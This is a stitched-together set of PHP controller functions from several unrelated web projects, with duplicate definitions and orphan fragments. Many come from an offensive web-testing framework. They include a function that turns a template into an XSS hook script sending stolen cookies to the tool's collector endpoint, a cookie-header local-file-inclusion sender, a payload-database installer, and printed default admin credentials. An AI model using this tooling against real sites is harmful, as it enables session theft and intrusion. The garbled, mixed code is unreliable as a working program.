/**
* validate email address
* @param string $val
* @param string $context
* @param bool $mx
* @return bool
*/
function email($val, $context = null, $mx = true)
{
$valid = true;
if (!$context) {
$context = 'error.validation.email';
}
if (!empty($val)) {
if (!\Audit::instance()->email($val, false)) {
$val = NULL;
if (!$this->f3->exists($context . '.invalid', $errText)) {
$errText = 'e-mail is not valid';
}
$this->f3->error(400, $errText);
$valid = false;
} elseif ($mx && !\Audit::instance()->email($val, true)) {
$val = NULL;
if (!$this->f3->exists($context . '.host', $errText)) {
$errText = 'unknown mail mx.host';
}
$this->f3->error(400, $errText);
$valid = false;
}
}
if (!$valid) {
\Flash::instance()->setKey($context, 'has-error');
}
return $valid;
}
function render()
{
// Clean all output given first
while (ob_get_level()) {
ob_end_clean();
}
$f3 = \Base::instance();
$f3->set('headline', 'Error ' . $f3->get('ERROR.code'));
$f3->set('text', $f3->get('ERROR.text'));
$f3->set('ESCAPE', false);
if ($f3->get('AJAX')) {
die(json_encode(array('error' => $f3->get('ERROR.text'))));
}
if ($f3->get('ERROR.code') == 400) {
\Flash::instance()->addMessage($f3->get('ERROR.text'), 'warning');
$f3->set('HALT', false);
return;
} elseif ($f3->get('ERROR.code') == 404) {
$f3->set('headline', 'Page not found');
} elseif ($f3->get('ERROR.code') == 405) {
$f3->set('headline', 'This action is not allowed');
} elseif ($f3->get('ERROR.code') == 500) {
$f3->set('headline', 'Internal Server Error');
if ($f3->get('DEV')) {
$f3->set('trace', $f3->highlight($f3->get('ERROR.trace')));
}
@mail($f3->get('error_mail'), 'Mth3l3m3nt Framework Error', $f3->get('ERROR.text') . "\n\n" . $f3->get('ERROR.trace'));
}
$f3->set('LAYOUT', 'error.html');
$f3->set('HALT', true);
echo \Template::instance()->render('themes/default/layout.html');
}
public function install($db_type)
{
$f3 = \Base::instance();
$db_type = strtoupper($db_type);
if ($db = storage::instance()->get($db_type)) {
$f3->set('DB', $db);
} else {
$f3->error(256, 'no valid DB specified');
}
// setup the models
\Model\Post::setup();
\Model\Tag::setup();
\Model\Comment::setup();
\Model\User::setup();
// create demo admin user
$user = new \Model\User();
$user->load(array('username = ?', 'admin'));
if ($user->dry()) {
$user->username = '******';
$user->name = 'Administrator';
$user->password = '******';
$user->save();
\Flash::instance()->addMessage('Admin User created,' . ' username: admin, password: fabulog', 'success');
}
\Flash::instance()->addMessage('Setup complete', 'success');
}
/**
* @param \Base $f3
* Description This function will be used to create the necessary script needed to hook a page.
*/
function create_campaign(\Base $f3)
{
$web = \Web::instance();
$this->response->data['SUBPART'] = 'xssrc_campaign.html';
if ($f3->get('VERB') == 'POST') {
$error = false;
if ($f3->devoid('POST.targetUrl')) {
$error = true;
\Flash::instance()->addMessage('Please enter a Target url to test access once you steal cookies e.g. http://victim.mth3l3m3nt.com/admin', 'warning');
} else {
$target_url = $f3->get('POST.targetUrl');
$c_host = parse_url($target_url, PHP_URL_HOST);
$template_src = $f3->ROOT . $f3->BASE . '/scripts/attack_temp.mth3l3m3nt';
$campaign_file = $f3->ROOT . $f3->BASE . '/scripts/' . $c_host . '.js';
$campaign_address = $f3->SCHEME . "://" . $f3->HOST . $f3->BASE . '/scripts/' . $c_host . '.js';
$postHome = $f3->SCHEME . "://" . $f3->HOST . $f3->BASE . '/xssr';
copy($template_src, $campaign_file);
$unprepped_contents = file_get_contents($campaign_file);
$unprepped_contents = str_replace("http://attacker.mth3l3m3nt.com/xssr", $postHome, $unprepped_contents);
$unprepped_contents = str_replace("http://victim.mth3l3m3nt.com/admin/", $target_url, $unprepped_contents);
file_put_contents($campaign_file, $unprepped_contents);
$instructions = \Flash::instance()->addMessage('Attach the script to target e.g. <script src="' . $campaign_address . '"></script>', 'success');
$this->response->data['content'] = $instructions;
}
}
}
public static function getInstance()
{
if (!self::$instance) {
self::$instance = new Flash();
}
return self::$instance;
}
public static function instance()
{
if (Flash::$instance === NULL) {
Flash::$instance = new Flash();
}
return Flash::$instance;
}
/**
* Login Procedure
* @param $f3
* @param $params
*/
public function login($f3, $params)
{
if ($f3->exists('POST.username') && $f3->exists('POST.password')) {
sleep(3);
// login should take a while to kick-ass brute force attacks
$user = new \Model\User();
$user->load(array('username = ?', $f3->get('POST.username')));
if (!$user->dry()) {
// check hash engine
$hash_engine = $f3->get('password_hash_engine');
$valid = false;
if ($hash_engine == 'bcrypt') {
$valid = \Bcrypt::instance()->verify($f3->get('POST.password'), $user->password);
} elseif ($hash_engine == 'md5') {
$valid = md5($f3->get('POST.password') . $f3->get('password_md5_salt')) == $user->password;
}
if ($valid) {
@$f3->clear('SESSION');
//recreate session id
$f3->set('SESSION.user_id', $user->_id);
if ($f3->get('CONFIG.ssl_backend')) {
$f3->reroute('https://' . $f3->get('HOST') . $f3->get('BASE') . '/');
} else {
$f3->reroute('/cnc');
}
}
}
\Flash::instance()->addMessage('Wrong Username/Password', 'danger');
}
$this->response->setTemplate('templates/login.html');
}
/**
* Init Flash service
*
* @param void
* @return null
*/
function init()
{
if (isset($this) && instance_of($this, 'Flash')) {
$this->readFlash();
} else {
$instance =& Flash::instance();
$instance->init();
}
// if
}
/**
* @param \Base $f3
* @param array $params
* @return bool
*/
public function getSingle(\Base $f3, $params)
{
$this->response->data['SUBPART'] = 'comment_edit.html';
if (isset($params['id'])) {
$this->response->data['comment'] = $this->resource->load(array('_id = ?', $params['id']));
if (!$this->resource->dry()) {
return true;
}
}
\Flash::instance()->addMessage('Unknown Comment ID', 'danger');
$f3->reroute($f3->get('SESSION.LastPageURL'));
}
public function delete()
{
$flash = Flash::instance();
$event = $this->_templateobject;
$event->load($this->_data['id']);
if ($event->delete()) {
$flash->addMessage('Event deleted successfully');
sendTo('crmcalendars', 'index', $this->_modules);
} else {
$flash->addError('Failed to delete event');
sendBack();
}
}
public function delete(\Base $f3, $params)
{
$this->resource->reset();
$msg = \Flash::instance();
if (isset($params['id'])) {
$this->resource->load(array('_id = ?', $params['id']));
if ($f3->get('HOST') == 'ikkez.de' && !$this->resource->dry() && $this->resource->username == 'admin') {
$msg->addMessage("You are not allowed to delete the demo-admin", 'danger');
$f3->reroute('/admin/' . $params['module']);
return;
}
parent::delete($f3, $params);
}
$f3->reroute($f3->get('SESSION.LastPageURL'));
}
/**
* delete a record
* @param \Base $f3
* @param array $params
*/
public function delete(\Base $f3, $params)
{
$this->resource->reset();
$flash = \Flash::instance();
if (isset($params['id'])) {
$this->resource->load(array('_id = ?', $params['id']));
if ($this->resource->dry()) {
$flash->addMessage('No record found with this ID.', 'danger');
} else {
$this->resource->erase();
$flash->addMessage("Record deleted.", 'success');
}
}
$f3->reroute($f3->get('SESSION.LastPageURL'));
}
public function generic_request(\Base $f3)
{
$web = \Web::instance();
$this->response->data['SUBPART'] = 'websaccre_generic_request.html';
$audit_instance = \Audit::instance();
if ($f3->get('VERB') == 'POST') {
$error = false;
if ($f3->devoid('POST.url')) {
$error = true;
\Flash::instance()->addMessage('Please enter a url e.g. http://africahackon.com', 'warning');
} else {
$audited_url = $audit_instance->url($f3->get('POST.url'));
if ($audited_url == TRUE) {
/**
*
Shared Hosting Servers Have an issue ..safemode and openbasedir setr and curl gives error enable the lines below and comment out the $request_successful one
$options = array('follow_location'=>FALSE);
$request_successful=$web->request($f3->get('POST.url'),$options);
*
*/
//handle POST data
$postReceive = $f3->get('Post.postReceive');
$postData = explode("&", $postReceive);
$postData = array_map("trim", $postData);
$address = $f3->get('POST.url');
if ($f3->get('POST.means') == "POST") {
$options = array('method' => $f3->get('POST.means'), 'content' => http_build_query($postData));
} else {
$options = array('method' => $f3->get('POST.means'));
}
$request_successful = $web->request($address, $options);
if (!$request_successful) {
\Flash::instance()->addMessage('You have entered an invalid URL try something like: http://africahackon.com', 'warning');
} else {
$result_body = $request_successful['body'];
$result_headers = $request_successful['headers'];
$engine = $request_successful['engine'];
$headers_max = implode("\n", $result_headers);
$myFinalRequest = "Headers: \n\n" . $headers_max . "\n\n Body:\n\n" . $result_body . "\n\n Engine Used: " . $engine;
$this->response->data['content'] = $myFinalRequest;
}
} else {
\Flash::instance()->addMessage('You have entered an invalid URL try something like: http://africahackon.com', 'danger');
}
}
}
}
/**
* Handles Your little Hurl.it like service to make requests to remote servers using various methods
* @package Controller
*/
public function generic_request(\Base $f3)
{
$web = \Web::instance();
$this->response->data['SUBPART'] = 'websaccre_generic_request.html';
$audit_instance = \Audit::instance();
if ($f3->get('VERB') == 'POST') {
$error = false;
if ($f3->devoid('POST.url')) {
$error = true;
\Flash::instance()->addMessage('Please enter a url e.g. http://africahackon.com', 'warning');
} else {
$audited_url = $audit_instance->url($f3->get('POST.url'));
if ($audited_url == TRUE) {
//handle POST data
$postReceive = $f3->get('POST.postReceive');
$createPostArray = parse_str($postReceive, $postData);
if (ini_get('safe_mode')) {
$follow_loc = FALSE;
} else {
$follow_loc = TRUE;
}
$address = $f3->get('POST.url');
if ($f3->get('POST.means') == "POST") {
$options = array('method' => $f3->get('POST.means'), 'content' => http_build_query($postData), 'follow_location' => $follow_loc);
$request_successful = $web->request($address, $options);
} elseif ($f3->get('POST.means') == "GET" or $f3->get('POST.means') == "TRACE" or $f3->get('POST.means') == "OPTIONS" or $f3->get('POST.means') == "HEAD") {
$options = array('method' => $f3->get('POST.means'), 'follow_location' => $follow_loc);
$request_successful = $web->request($address, $options);
} else {
\Flash::instance()->addMessage('Unsupported Header Method', 'danger');
}
if (!$request_successful) {
\Flash::instance()->addMessage('Something went wrong your request could not be completed.', 'warning');
} else {
$result_body = $request_successful['body'];
$result_headers = $request_successful['headers'];
$engine = $request_successful['engine'];
$headers_max = implode("\n", $result_headers);
$myFinalRequest = "Headers: \n\n" . $headers_max . "\n\n Body:\n\n" . $result_body . "\n\n Engine Used: " . $engine;
$this->response->data['content'] = $myFinalRequest;
}
} else {
\Flash::instance()->addMessage('You have entered an invalid URL try something like: http://africahackon.com', 'danger');
}
}
}
}
/**
* Installs tables with default user
* @param $db_type
*/
public function install($db_type)
{
$f3 = \Base::instance();
$db_type = strtoupper($db_type);
if ($db = DBHandler::instance()->get($db_type)) {
$f3->set('DB', $db);
} else {
$f3->error(256, 'no valid Database Type specified');
}
// setup the models
\Model\User::setup();
\Model\Payload::setup();
\Model\Webot::setup();
// create demo admin user
$user = new \Model\User();
$user->load(array('username = ?', 'mth3l3m3nt'));
if ($user->dry()) {
$user->username = '******';
$user->name = 'Framework Administrator';
$user->password = '******';
$user->email = '*****@*****.**';
$user->save();
//migrate payloads successfully
$payload_file = $f3->ROOT . $f3->BASE . '/db_dump_optional/mth3l3m3nt_payload';
if (file_exists($payload_file)) {
$payload = new \Model\Payload();
$payload_file_data = $f3->read($payload_file);
$payloadarray = json_decode($payload_file_data, true);
foreach ($payloadarray as $payloaddata) {
$payload->pName = $payloaddata['pName'];
$payload->pType = $payloaddata['pType'];
$payload->pCategory = $payloaddata['pCategory'];
$payload->pDescription = $payloaddata['pDescription'];
$payload->payload = $payloaddata['payload'];
$payload->save();
//ensures values set to null before continuing update
$payload->reset();
}
//migtate payloads
\Flash::instance()->addMessage('Payload StarterPack: ,' . 'All Starter Pack Payloads added New database', 'success');
} else {
\Flash::instance()->addMessage('Payload StarterPack: ,' . 'StarterPack Database not Found no payloads installed ', 'danger');
}
\Flash::instance()->addMessage('Admin User created,' . ' username: mth3l3m3nt, password: mth3l3m3nt', 'success');
}
\Flash::instance()->addMessage('New Database Setup Completed', 'success');
}
public function database(\Base $f3)
{
$this->response->data['SUBPART'] = 'settings_database.html';
$cfg = \Config::instance();
if ($f3->get('VERB') == 'POST' && $f3->exists('POST.active_db')) {
$type = $f3->get('POST.active_db');
$cfg->{'DB_' . $type} = $f3->get('POST.DB_' . $type);
$cfg->ACTIVE_DB = $type;
$cfg->save();
\Flash::instance()->addMessage('Config saved', 'success');
$setup = new \Setup();
$setup->install($type);
// logout
$f3->clear('SESSION.user_id');
}
$cfg->copyto('POST');
$f3->set('JIG_format', array('JSON', 'Serialized'));
}
function post_index($f3)
{
$user = \User::createUser(\kksd\Sesi::$DB);
$user->load(array("email=?", $f3->POST['email']));
if ($user->checkLogin($f3->get('POST.email'), $f3->get('POST.password'))) {
$user->load(array("email=?", $f3->POST['email']));
$f3->SESSION['user_type'] = 'admin';
if (!$f3->POST['remember']) {
$f3->SESSION['user'] = $user->id;
$f3->SESSION['user_obj'] = $user;
} else {
$f3->set('COOKIE.user', $user->id, time() + 24 * 3600 * 7);
}
$f3->reroute('@admin_home');
return;
}
\Flash::instance()->addMessage('Wrong password, you morron!', 'danger');
$this->index($f3);
return;
}
public function getwhois(\Base $f3)
{
$web = \Web::instance();
$this->response->data['SUBPART'] = 'websaccre_whois.html';
if ($f3->get('VERB') == 'POST') {
$error = false;
if ($f3->devoid('POST.hostname')) {
$error = true;
\Flash::instance()->addMessage('Please enter a hostname e.g. africahackon.com', 'warning');
} else {
$address = $f3->get('POST.hostname');
$mywhois = $web->whois($address);
if (!$mywhois) {
\Flash::instance()->addMessage('You have entered an invalid hostname try something like: africahackon.com', 'warning');
} else {
$this->response->data['content'] = $mywhois;
}
}
}
}
public function delete()
{
$accessobject = AccessObject::Instance();
$editable = $accessobject->hasPermission('despatch', 'sodespatchevents', 'edit');
if ($editable) {
$flash = Flash::instance();
$event = $this->_uses['SODespatchEvent'];
$event->load($this->_data['id']);
$this->_data['SODespatchEvent']['id'] = $this->_data['id'];
$this->_data['SODespatchEvent']['status'] = 'X';
if (parent::save('SODespatchEvent')) {
$flash->clearMessages();
$flash->addMessage("Event successfully deleted");
sendTo('sodespatchevents', 'index', array('despatch'));
} else {
$flash->addError("Failed to delete event");
sendBack();
}
} else {
$flash->addError("You don't have permission to delete an event");
sendBack();
}
}
public function cookie_based_lfi($method, $blankurl, $url, $payload)
{
$web = \Web::instance();
$f3 = \Base::instance();
$options = array('method' => $method, 'header' => array('Accept: */*', 'User-Agent: Mth3l3m3ntFramework/4.0 (compatible; MSIE 6.0; HackingtoshTuxu 4.0; .NET CLR 1.1.4322)', 'Cookie: ' . $payload, 'Connection: Close', 'Pragma: no-cache', 'Cache-Control: no-cache'));
$audit_instance = \Audit::instance();
if ($f3->get('VERB') == 'POST') {
$error = false;
if ($blankurl) {
$error = true;
\Flash::instance()->addMessage('Please enter a url e.g. http://africahackon.com', 'warning');
} else {
$audited_url = $audit_instance->url($url);
if ($audited_url == TRUE) {
$request_successful = $web->request($url, $options);
if (!$request_successful) {
\Flash::instance()->addMessage('You have entered an invalid URL try something like: http://africahackon.com', 'warning');
} else {
$result_body = $request_successful['body'];
$result_headers = $request_successful['headers'];
$response_header = $result_headers["0"];
$engine = $request_successful['engine'];
$headers_max = implode("\n", $result_headers);
if (strpos($response_header, '200 OK') !== false) {
$myFinalRequest = "Headers: \n\n" . $headers_max . "\n\n Body:\n\n" . $result_body . "\n\n Engine Used: " . $engine;
$this->response->data['content'] = $myFinalRequest;
} else {
$this->response->data['content'] = "Not Exploitable Application Returned the response below: \n\n " . $headers_max;
}
//convert array header to string
}
} else {
\Flash::instance()->addMessage('You have entered an invalid URL try something like: http://africahackon.com', 'danger');
}
}
}
}
public function save()
{
$errors = array();
$person = $this->_templateobject;
$personmodel = get_class($person);
if (!$this->checkParams($personmodel)) {
sendBack();
}
$persondata = $this->_data[$personmodel];
$personidfield = $person->idField;
if (isset($persondata[$person->idField])) {
$personid = $persondata[$personidfield];
} else {
$personid = '';
}
if (!empty($personid)) {
$person->load($personid);
if (!$person->isLoaded()) {
$flash = Flash::instance();
$flash->addError('You do not have permission to edit this person.');
sendTo($this->name, 'index', $this->_modules);
return;
}
}
$flash = Flash::Instance();
$db =& DB::Instance();
$db->StartTrans();
if (isset($this->_data['Address']) && !empty($this->_data['Address']['id'])) {
// Selected pre-existing address
unset($this->_data['Address']);
}
if (isset($this->_data['PartyAddress']) && isset($this->_data['Address'])) {
$partyaddress = DataObjectFactory::Factory('PartyAddress');
$partyaddress->checkAddress($this->_data);
}
$partycontactmethod = DataObjectFactory::Factory('PartyContactMethod');
foreach ($partycontactmethod->getEnumOptions('type') as $key => $type) {
if (isset($this->_data[$type]['PartyContactMethod']) && isset($this->_data[$type]['Contactmethod'])) {
if (empty($this->_data[$type]['Contactmethod']['contact'])) {
if (!empty($this->_data[$type]['PartyContactMethod'][$partycontactmethod->idField])) {
$partycontactmethod->delete($this->_data[$type]['PartyContactMethod'][$partycontactmethod->idField], $errors);
}
unset($this->_data[$type]);
} else {
$partycontactmethod->check($this->_data[$type]);
}
}
}
if (count($errors) == 0 && parent::save($personmodel, $this->_data, $errors)) {
foreach ($this->saved_models as $model) {
if (isset($model[$personmodel])) {
$person = $model[$personmodel];
break;
}
}
// Now get the saved Person details
$person_id = $person->{$personidfield};
$people_category = DataObjectFactory::Factory('PeopleInCategories');
$current_categories = $people_category->getCategoryID($person_id);
$check_categories = array();
$delete_categories = array();
$insert_categories = array();
$new_categories = array();
if (isset($this->_data['ContactCategories'])) {
$delete_categories = array_diff($current_categories, $this->_data['ContactCategories']['category_id']);
$insert_categories = array_diff($this->_data['ContactCategories']['category_id'], $current_categories);
$new_categories = array_diff($current_categories, $delete_categories);
$new_categories += $insert_categories;
} else {
$delete_categories = $current_categories;
}
$ledger_category = DataObjectFactory::Factory('LedgerCategory');
$ledger_types = $ledger_category->checkPersonUsage($person_id);
foreach ($ledger_types as $ledger_type => $categories) {
if ($categories['exists'] && !array_intersect($categories['categories'], $new_categories)) {
foreach (array_intersect($categories['categories'], $delete_categories) as $category_id) {
$category = DataObjectFactory::Factory('ContactCategory');
$category->load($category_id);
$errors[$category->name] = 'Cannot remove category ' . $category->name . ' - ' . $ledger_type . ' entry exists';
}
}
}
$result = count($errors) == 0;
if (!empty($delete_categories) && $result) {
// All OK, so delete the associations
$result = $people_category->delete(array_keys($delete_categories), $errors);
}
if (!empty($insert_categories) && $result) {
// No errors and some new categories to assign to the person
$result = $people_category->insert($insert_categories, $person_id);
}
if ($result) {
// All OK
$db->CompleteTrans();
sendTo($this->name, 'view', $this->_modules, array($personidfield => $person_id));
}
}
$flash = Flash::Instance();
$flash->addErrors($errors);
$db->FailTrans();
$db->CompleteTrans();
$this->refresh();
}
/**
* @param \Base $f3
* @param array $params
*/
public function delete(\Base $f3, $params)
{
$this->resource->reset();
$msg = \Flash::instance();
if (isset($params['id'])) {
$this->resource->load(array('_id = ?', $params['id']));
parent::delete($f3, $params);
}
$f3->reroute($f3->get('SESSION.LastPageURL'));
}
* resources etc
*
* @version 1.0
* @http://www.projectpier.org/
*/
trace(__FILE__, 'begin');
define('FILE_STORAGE_FILE_SYSTEM', 'fs');
define('FILE_STORAGE_MYSQL', 'mysql');
define('TOKEN_COOKIE_NAME', 'pp088' . TABLE_PREFIX);
//$installation_root = config_option('installation_root', dirname($_SERVER['PHP_SELF']) );
$path = $_SERVER['PHP_SELF'];
$path = substr($path, 0, strpos($path, 'index.php'));
$installation_root = $path;
define('ROOT_URL', $installation_root);
// Init flash!
Flash::instance();
$language = config_option('installation_base_language', 'en_us');
if (isset($_GET['language'])) {
$_SESSION['language'] = $_GET['language'];
$_GET['language'] = '';
}
if (isset($_SESSION['language'])) {
$language = $_SESSION['language'];
}
if (!plugin_active('i18n')) {
Localization::instance()->loadSettings($language, ROOT . '/language');
}
try {
trace(__FILE__, 'CompanyWebsite::init()');
CompanyWebsite::init();
if (config_option('upgrade_check_enabled', false)) {
}
if (!is_writable('framework/data/')) {
$writeableErr[] = sprintf('please make sure that the \'%s\' directory is writable.', 'framework/data/');
}
if (!is_writable('framework/data/site_config.json')) {
$writeableErr[] = sprintf('please make sure that the \'%s\' file is writable.', 'framework/data/site_config.json');
}
//handles all pagination
\Template::instance()->extend('pagebrowser', '\\Pagination::renderTag');
\Template\FooForms::init();
if (isset($writeableErr)) {
header('Content-Type: text;');
die(implode("\n", $writeableErr));
}
//Initialize some F3 Settings
$f3->set('FLASH', Flash::instance());
$web = Web::instance();
//Database Setup From our Config Class Instance
$cfg = Config::instance();
$f3->set('CONFIG', $cfg);
if ($cfg->ACTIVE_DB) {
$f3->set('DB', DBHandler::instance()->get($cfg->ACTIVE_DB));
} else {
$f3->error(500, 'Sorry, but there is no active DB setup.');
}
///////////////
// frontend //
///////////////
$f3->route(array('GET /', 'GET /@page', 'GET /payloads', 'GET /page/@page'), 'Controller\\Payload->getList');
// view single
$f3->route(array('GET /payload/@id'), 'Controller\\Payload->viewSingle');
/**
* Returns and removes variable from flash.
*
* @param unknown_type $name
* @return unknown
*/
function flash_pop($name) {
$ret = Flash::instance()->getVariable($name);
Flash::instance()->removeVariable($name);
return $ret;
}
/**
* Conflict incoming mail
*
* @param void
* @return void
*/
function conflict()
{
if ($this->active_mail->isNew()) {
$this->httpError(HTTP_ERR_NOT_FOUND);
}
// if
require_once INCOMING_MAIL_MODULE_PATH . '/models/IncomingMailImporter.class.php';
$mail_data = $this->request->post('mail');
if (!is_foreachable($mail_data)) {
flash_error(incoming_mail_module_get_status_description($this->active_mail->getState()));
$mail_data = array('subject' => $this->active_mail->getSubject(), 'body' => $this->active_mail->getBody(), 'created_by_id' => $this->active_mail->getCreatedById(), 'project_id' => $this->active_mail->getProjectId());
}
// if
if ($this->request->isSubmitted()) {
$this->active_mail->setSubject(array_var($mail_data, 'subject'));
$this->active_mail->setBody(array_var($mail_data, 'body'));
$creator_id = array_var($mail_data, 'created_by_id');
if ($creator_id && $creator_id != 'original_author') {
$creator = Users::findById($creator_id);
if (instance_of($creator, 'User')) {
$this->active_mail->setCreatedBy($creator);
}
// if
}
// if
$this->active_mail->setCreatedById(array_var($mail_data, 'created_by_id'));
$this->active_mail->setObjectType(array_var($mail_data, 'object_type'));
if (array_var($mail_data, 'object_type') == 'comment') {
$this->active_mail->setParentId(array_var($mail_data, 'parent_id'));
}
// if
// import email
if (instance_of($importing_result = IncomingMailImporter::importPendingEmail($this->active_mail, $creator_id == 'original_author'), 'ProjectObject')) {
// we have successfully imported email
$this->active_mail->delete();
if ($this->request->isAsyncCall()) {
$this->renderText(lang('<p>Conflict Solved Successfully!</p><p>View created <a href=":url">:object</a>.</p>', array('object' => $this->active_mail->getObjectType(), 'url' => $importing_result->getViewUrl())));
} else {
flash_success('Conflict Solved Successfully!');
$this->redirectTo('incoming_mail');
}
// if
} else {
if ($this->request->isAsyncCall()) {
$this->httpError(HTTP_ERR_INVALID_PROPERTIES, null, false, 2);
} else {
flash_error($importing_result->getMessage());
}
// if
}
// if
}
// if
$user = $this->active_mail->getCreatedBy();
if (instance_of($user, 'User')) {
$this->smarty->assign('object_user', $user);
} else {
$this->smarty->assign('object_user', $this->logged_user);
}
// if
$this->smarty->assign(array('async' => $this->request->isAsyncCall(), 'form_url' => $this->active_mail->getImportUrl() . ($this->request->isAsyncCall() ? '?skip_layout=1&async=1' : ''), 'status_message' => incoming_mail_module_get_status_description($this->active_mail->getState()), 'mail_data' => $mail_data, 'project' => $this->active_mail->getProject()));
$flash =& Flash::instance();
$flash->init();
js_assign('additional_fields_url', assemble_url('incoming_mail_additional_form_fields'));
}
/**
* Handles Decoding Functions
* @param \Base $f3
*/
public function decoder_multi(\Base $f3)
{
$this->response->data['SUBPART'] = 'dencoder_decoder_multi.html';
$audit_instance = \Audit::instance();
if ($f3->get('VERB') == 'POST') {
$error = false;
if ($f3->devoid('POST.encoded')) {
$error = true;
\Flash::instance()->addMessage('Please enter Some text to decode e.g. 0xaaaa ', 'warning');
} else {
$encoded_text_string = $f3->get('POST.encoded');
$encodedFormat = $f3->get('POST.encodedFormat');
switch ($encodedFormat) {
case "base64":
$decoded = trim($encoded_text_string);
if (base64_encode(base64_decode($decoded)) === $decoded) {
$decoded = base64_decode($decoded, true);
$this->response->data['content'] = $decoded;
} else {
\Flash::instance()->addMessage('Please enter a valid base 64 string e.g. dGVzdG1l ', 'warning');
}
break;
case "hex":
$decoded = trim($encoded_text_string);
if (is_numeric('0x' . $decoded)) {
if (function_exists('hex2bin')) {
$decoded = hex2bin($decoded);
$this->response->data['content'] = $decoded;
} else {
\Flash::instance()->addMessage('Seems you are missing the hex2bin function , this is common with PHP 5.3 and below \\n Sorry I can\'t work this . ', 'warning');
}
} else {
\Flash::instance()->addMessage('Invalid Hexadecimal String detected, check for trailing spaces or invalid characters then try again.', 'warning');
}
break;
case "hex_0x":
$clear_prefix = str_replace("0x", "", $encoded_text_string);
$clear_prefix = trim($clear_prefix);
if (is_numeric('0x' . $clear_prefix)) {
if (function_exists('hex2bin')) {
$decoded = hex2bin($clear_prefix);
$this->response->data['content'] = $decoded;
} else {
\Flash::instance()->addMessage('Seems you are missing the hex2bin function , this is common with PHP 5.3 and below \\n Sorry I can\'t work this . ', 'warning');
}
} else {
\Flash::instance()->addMessage('Invalid Hexadecimal String detected, check for trailing spaces or invalid characters then try again.', 'warning');
}
break;
case "hex_slash_x":
$clear_prefix = str_replace("\\x", "", $encoded_text_string);
$clear_prefix = trim($clear_prefix);
if (is_numeric('0x' . $clear_prefix)) {
if (function_exists('hex2bin')) {
$decoded = hex2bin($clear_prefix);
$this->response->data['content'] = $decoded;
} else {
\Flash::instance()->addMessage('Seems you are missing the hex2bin function , this is common with PHP 5.3 and below \\n Sorry I can\'t work this . ', 'warning');
}
} else {
\Flash::instance()->addMessage('Invalid Hexadecimal String detected, check for trailing spaces or invalid characters then try again.', 'warning');
}
break;
case "rot13":
$decoded = str_rot13(trim($encoded_text_string));
$this->response->data['content'] = $decoded;
break;
default:
\Flash::instance()->addMessage('Seems You have Broken something or text is invalid \\n I can\'t process', 'warning');
}
}
}
}
/**
* Delete Cookies & Files with content from hooking page
* @param \Base $f3
* @param array $params
*/
public function delete(\Base $f3, $params)
{
$this->resource->reset();
$msg = \Flash::instance();
if (isset($params['id'])) {
$this->resource->load(array('_id = ?', $params['id']));
$url1 = $this->resource->vulnerablePageContent;
$url2 = $this->resource->indirect_target_page;
$url3 = $this->resource->vulnerableUrl;
$vulnPage = $f3->ROOT . parse_url($url1, PHP_URL_PATH);
$targetPage = $f3->ROOT . parse_url($url2, PHP_URL_PATH);
$attack_script = $f3->ROOT . $f3->BASE . '/scripts/' . parse_url($url3, PHP_URL_HOST) . '.js';
if (file_exists($vulnPage) || file_exists($targetPage) || file_exists($attack_script)) {
unlink($vulnPage);
unlink($targetPage);
unlink($attack_script);
}
parent::delete($f3, $params);
}
$f3->reroute($f3->get('SESSION.LastPageURL'));
}
public function hide($f3, $params)
{
if ($this->resource->updateProperty(array('_id = ?', $params['id']), 'published', false)) {
\Flash::instance()->addMessage('Your post is now hidden.', 'success');
} else {
\Flash::instance()->addMessage('This Post ID was not found', 'danger');
}
$f3->reroute('/admin/post');
}
public function update_prices()
{
$flash = Flash::instance();
$errors = array();
$warnings = array();
$db = DB::Instance();
$start_date = $_SESSION['price_uplift_params']['price_uplift_start_date'];
$end_date = $_SESSION['price_uplift_params']['price_uplift_end_date'];
$selected = empty($_SESSION['price_uplift'][$this->_data['page']]) ? array() : $_SESSION['price_uplift'][$this->_data['page']];
$count = 0;
foreach ($selected as $id => $detail) {
$db->StartTrans();
if ($detail['select'] == 'true') {
$productline = DataObjectFactory::Factory('SOProductLine');
$productline->load($id);
if (!$productline->isLoaded()) {
$errors[$id] = 'Failed to find product details ' . $id;
} elseif ($productline->price == $detail['new_price']) {
$warnings[$id] = 'Entry not updated because price has not changed ref:' . $id;
} else {
$productline->end_date = $end_date;
if (!$productline->save()) {
$errors[$id] = 'Failed to close off old price ref:' . $id . ' - ' . $db->ErrorMsg();
} else {
$test = $productline->autoHandle($productline->idField);
if ($test !== false) {
$productline->id = $test;
$productline->price = $detail['new_price'];
$productline->start_date = $start_date;
$productline->end_date = null;
$productline->created = fix_date(date(DATE_FORMAT));
$productline->createdby = EGS_USERNAME;
if (!$productline->save()) {
$errors[$id] = 'Failed to save new price ref:' . $id . ' - ' . $db->ErrorMsg();
} else {
$count++;
}
} else {
$errors[] = 'Error getting identifier for new price';
}
}
}
unset($productline);
}
$db->CompleteTrans();
$_SESSION['price_uplift_params']['price_uplift_progress_count']++;
}
if (count($errors) > 0) {
$flash->addErrors($errors);
}
if (count($warnings) > 0) {
$flash->addWarnings($warnings);
}
$flash->save();
$_SESSION['price_uplift_params']['price_uplift_updated_count'] += $count;
echo json_encode(array('updated_count' => $count, 'warnings' => $warnings, 'errors' => $errors));
exit;
}
